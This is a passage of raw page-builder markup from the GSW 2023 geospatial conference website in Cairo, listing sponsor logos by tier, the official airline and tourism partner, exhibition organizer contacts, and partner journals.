height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" 